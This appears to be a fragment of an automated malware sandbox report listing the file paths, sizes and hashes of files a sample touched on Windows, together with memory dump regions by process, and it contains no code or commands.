C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\Temp\__PSScriptPolicyTest_pnjnn0jf.zdd.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
memory/384-109-0x00000161406F0000-0x000001614071B000-memory.dmpFilesize
172KB
-
memory/612-74-0x000001A838DD0000-0x000001A838DF5000-memory.dmpFilesize
148KB
-
memory/612-83-0x00007FFC60850000-0x00007FFC60860000-memory.dmpFilesize
64KB
-
memory/612-76-0x000001A838E00000-0x000001A838E2B000-memory.dmpFilesize
172KB
-
memory/612-75-0x000001A838E00000-0x000001A838E2B000-memory.dmpFilesize
172KB
-
memory/612-82-0x000001A838E00000-0x000001A838E2B000-memory.dmpFilesize
172KB
-
memory/676-94-0x00007FFC60850000-0x00007FFC60860000-memory.dmpFilesize
64KB
-
memory/676-93-0x0000029A236D0000-0x0000029A236FB000-memory.dmpFilesize
172KB
-
memory/676-87-0x0000029A236D0000-0x0000029A236FB000-memory.dmpFilesize
172KB
-
memory/920-58-0x00007FFCA07D0000-0x00007FFCA09C5000-memory.dmpFilesize
2.0MB
-
memory/920-59-0x00007FFC9F5D0000-0x00007FFC9F68E000-memory.dmpFilesize
760KB
-
memory/956-105-0x00007FFC60850000-0x00007FFC60860000-memory.dmpFilesize
64KB
-
memory/956-104-0x00000203289D0000-0x00000203289FB000-memory.dmpFilesize
172KB
-
memory/956-98-0x00000203289D0000-0x00000203289FB000-memory.dmpFilesize
172KB
-
memory/2868-4-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/2868-0-0x00000000745CE000-0x00000000745CF000-memory.dmpFilesize
4KB
-
memory/2868-1-0x00000000001A0000-0x000000000020C000-memory.dmpFilesize
432KB
-
memory/2868-7-0x0000000005E60000-0x0000000005E9C000-memory.dmpFilesize
240KB
-
memory/2868-20-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/2868-6-0x0000000005920000-0x0000000005932000-memory.dmpFilesize
72KB
-
memory/2868-5-0x0000000004D40000-0x0000000004DA6000-memory.dmpFilesize
408KB
-
memory/2868-2-0x00000000050F0000-0x0000000005694000-memory.dmpFilesize
5.6MB
-
memory/2868-3-0x0000000004CA0000-0x0000000004D32000-memory.dmpFilesize
584KB
-
memory/3556-1680-0x00007FF7BCA30000-0x00007FF7BCC89000-memory.dmpFilesize
2.3MB
-
memory/3556-2103-0x00007FF7BCA30000-0x00007FF7BCC89000-memory.dmpFilesize
2.3MB
-
memory/3600-67-0x00007FFC9F5D0000-0x00007FFC9F68E000-memory.dmpFilesize
760KB
-
memory/3600-66-0x00007FFCA07D0000-0x00007FFCA09C5000-memory.dmpFilesize
2.0MB
-
memory/3916-2304-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/3916-1250-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/3916-1249-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/3916-13-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/3916-35-0x0000000006AA0000-0x0000000006AAA000-memory.dmpFilesize
40KB
-
memory/3916-14-0x00000000745C0000-0x0000000074D70000-memory.dmpFilesize
7.7MB
-
memory/4412-47-0x00007FFC9F5D0000-0x00007FFC9F68E000-memory.dmpFilesize
760KB
-
memory/4412-26-0x000001AEEF5E0000-0x000001AEEF602000-memory.dmpFilesize
136KB
-
memory/4412-45-0x000001AEEF980000-0x000001AEEF9AA000-memory.dmpFilesize
168KB
-
memory/4412-46-0x00007FFCA07D0000-0x00007FFCA09C5000-memory.dmpFilesize
2.0MB
-
memory/4920-48-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4920-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4920-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4920-49-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4920-53-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4920-54-0x00007FFCA07D0000-0x00007FFCA09C5000-memory.dmpFilesize
2.0MB
-
memory/4920-55-0x00007FFC9F5D0000-0x00007FFC9F68E000-memory.dmpFilesize
760KB
-
memory/4920-71-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB